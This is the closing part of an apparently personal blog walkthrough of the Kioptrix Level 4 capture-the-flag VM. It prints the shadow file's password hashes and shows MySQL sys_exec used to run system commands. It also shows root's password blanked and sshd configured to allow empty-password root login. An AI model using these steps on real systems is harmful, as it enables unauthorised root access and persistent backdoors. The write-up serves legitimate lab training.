+--------------------------------------+

| NULL |

+--------------------------------------+

1 row in set (0.01 sec)

mysql> exit

john@Kioptrix4:/home/loneferret$ cd /root

john@Kioptrix4:/root$ ls

congrats.txt lshell-0.9.12

john@Kioptrix4:/root$ ls -la

total 44

drwxr-xr-x 4 john john 4096 2012-02-06 18:46 .

drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..

-rw------- 1 john john 59 2012-02-06 20:24 .bash_history

-rw-r--r-- 1 john john 2227 2007-10-20 07:51 .bashrc

-rw-r--r-- 1 john john 625 2012-02-06 10:48 congrats.txt

-rw-r--r-- 1 john john 1 2012-02-05 10:38 .lhistory

drwxr-xr-x 8 john john 4096 2012-02-04 17:01 lshell-0.9.12

-rw------- 1 john john 1 2012-02-05 10:38 .mysql_history

-rw------- 1 john john 5 2012-02-06 18:38 .nano_history

-rw-r--r-- 1 john john 141 2007-10-20 07:51 .profile

drwx------ 2 john john 4096 2012-02-06 11:43 .ssh

john@Kioptrix4:/root$ cat congrats.txt
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

Let us continue the game:

cat /etc/shadow

root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::

daemon:*:15374:0:99999:7:::

bin:*:15374:0:99999:7:::

sys:*:15374:0:99999:7:::

sync:*:15374:0:99999:7:::

games:*:15374:0:99999:7:::

man:*:15374:0:99999:7:::

lp:*:15374:0:99999:7:::

mail:*:15374:0:99999:7:::

news:*:15374:0:99999:7:::

uucp:*:15374:0:99999:7:::

proxy:*:15374:0:99999:7:::

www-data:*:15374:0:99999:7:::

backup:*:15374:0:99999:7:::

list:*:15374:0:99999:7:::

irc:*:15374:0:99999:7:::

gnats:*:15374:0:99999:7:::

nobody:*:15374:0:99999:7:::

libuuid:!:15374:0:99999:7:::

dhcp:*:15374:0:99999:7:::

syslog:*:15374:0:99999:7:::

klog:*:15374:0:99999:7:::

mysql:!:15374:0:99999:7:::

sshd:*:15374:0:99999:7:::

loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::

john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::

robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::

Let us change /etc/passwd to this:
root::0:0:root:/root:/bin/bash

And /etc/shadow to this:
root::::

Let us change now ssh config:

mysql> SELECT sys_exec('chown -R john.john /etc/ssh');
+-----------------------------------------+
| sys_exec('chown -R john.john /etc/ssh') |
+-----------------------------------------+
| NULL |
+-----------------------------------------+
1 row in set (0.01 sec)

vim sshd_config

# Package generated configuration file
# See the sshd(8) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
#UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog no
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

UsePAM no
"sshd_config" 77L, 1872C written

Let's reload the system:

mysql> SELECT sys_exec('reboot');

Broadcast message from root@Kioptrix4
(unknown) at 15:40 ...

The system is going down for reboot NOW!
+--------------------+
| sys_exec('reboot') |
+--------------------+
| NULL |
+--------------------+
1 row in set (0.02 sec)

Game over:
ssh root@192.168.180.136
root@Kioptrix4:~# ls -la
total 44
drwxr-xr-x 4 john john 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw------- 1 john john 62 2016-07-05 15:51 .bash_history
-rw-r--r-- 1 john john 2227 2007-10-20 07:51 .bashrc
-rw-r--r-- 1 john john 625 2012-02-06 10:48 congrats.txt
-rw-r--r-- 1 john john 1 2012-02-05 10:38 .lhistory
drwxr-xr-x 8 john john 4096 2012-02-04 17:01 lshell-0.9.12
-rw------- 1 john john 1 2012-02-05 10:38 .mysql_history
-rw------- 1 john john 5 2012-02-06 18:38 .nano_history
-rw-r--r-- 1 john john 141 2007-10-20 07:51 .profile
drwx------ 2 john john 4096 2016-07-05 15:23 .ssh

Regards,
Yuriy Stanchev/URIX

Pages

Tuesday, 16 August 2016

Kioptrix Level 4

About Me

Total Pageviews